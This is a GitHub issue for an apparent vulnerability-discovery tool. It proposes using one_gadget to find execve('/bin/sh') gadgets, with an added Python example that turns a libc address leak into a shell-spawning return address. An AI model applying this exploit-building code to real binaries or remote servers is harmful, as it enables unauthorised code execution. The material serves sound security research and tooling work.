Open icemonster opened 4 years ago
We could use one_gadget https://github.com/david942j/one_gadget to look for shell gadgets in the binary and the used libraries. Then it would just be a matter of using the result as the value for the --RET_ADDR flag.
Of course, this means we must get a libc base address leak first, which is not trivial. Some exploit-chaining infrastructure is needed.
Create a flag to indicate you want AVD to try to find an input that spawns a shell. Possibly also indicate an IP and port of a server running that binary, for direct exploitation.
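The glue the issue describes, as an added example that is not part of the issue text and not code from AVD or one_gadget: parse one_gadget's text output into gadget offsets and their constraints, turn a leaked libc symbol address into the libc base, pick a gadget whose constraints hold, and produce the absolute address in the two forms a --RET_ADDR-style flag might take. The sample one_gadget output embedded below is constructed in the shape of real output but with illustrative offsets, the symbol offset and leaked address are made up, and the assumption that --RET_ADDR accepts a hex string (or raw little-endian bytes) is mine, since the issue does not say what the flag expects.

```python
"""Turn a one_gadget hit plus a libc leak into a return address.

Added example for this issue; not code from AVD or one_gadget.
All offsets and addresses below are constructed for illustration.
"""
import re
import struct

# Constructed sample in the shape of `one_gadget libc.so.6` output.
# Offsets are illustrative, not from any real libc build.
SAMPLE_ONE_GADGET_OUTPUT = """\
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
"""

# A gadget header line: hex offset, then the call one_gadget reaches.
GADGET_HEADER = re.compile(r"^(0x[0-9a-fA-F]+)\s+(.+)$")


def parse_one_gadget(text):
    """Parse one_gadget text output into dicts of offset, call and constraints."""
    gadgets = []
    current = None
    for line in text.splitlines():
        if not line.strip() or line.strip() == "constraints:":
            continue
        m = GADGET_HEADER.match(line)
        if m:
            current = {"offset": int(m.group(1), 16),
                       "call": m.group(2),
                       "constraints": []}
            gadgets.append(current)
        elif current is not None and line.startswith("  "):
            # Indented lines under a header are that gadget's constraints.
            current["constraints"].append(line.strip())
    return gadgets


def libc_base_from_leak(leaked_addr, symbol_offset):
    """Leaked runtime address of a libc symbol minus its offset inside libc.so.6.

    A base that is not page-aligned means the leak or the offset is wrong
    (wrong libc build, or a pointer that is not the symbol you think it is).
    """
    base = leaked_addr - symbol_offset
    if base & 0xFFF:
        raise ValueError("libc base 0x%x is not page-aligned: bad leak or wrong offset" % base)
    return base


def pick_gadget(gadgets, satisfiable):
    """First gadget whose every constraint holds under the predicate `satisfiable`.

    `satisfiable` encodes what the caller knows about register/stack state
    at the time the gadget runs; returns None when no gadget fits.
    """
    for g in gadgets:
        if all(satisfiable(c) for c in g["constraints"]):
            return g
    return None


def ret_addr_for_flag(libc_base, gadget_offset, bits=64):
    """Absolute gadget address as hex text and as little-endian bytes.

    Which of the two --RET_ADDR would accept is an assumption of this example.
    """
    addr = libc_base + gadget_offset
    return hex(addr), struct.pack("<Q" if bits == 64 else "<I", addr)


def shell_ret_addr(one_gadget_text, leaked_addr, symbol_offset, satisfiable):
    """End-to-end: parse, rebase on the leak, choose a gadget, emit the address."""
    base = libc_base_from_leak(leaked_addr, symbol_offset)
    g = pick_gadget(parse_one_gadget(one_gadget_text), satisfiable)
    if g is None:
        return None
    return ret_addr_for_flag(base, g["offset"])


if __name__ == "__main__":
    # Constructed leak: say puts() leaked at this address and sits at 0x80aa0 in libc.
    knows = {"[rsp+0x40] == NULL"}          # what the caller can guarantee
    print(shell_ret_addr(SAMPLE_ONE_GADGET_OUTPUT, 0x7FFFF7A62AA0, 0x80AA0, knows.__contains__))
```

The predicate passed to pick_gadget is where the "exploit chaining infrastructure" from the issue plugs in: whatever the harness knows about rsp alignment or stack contents at the return decides which gadget is safe to use, and a gadget with unmet constraints returns to execve with garbage arguments instead of a shell.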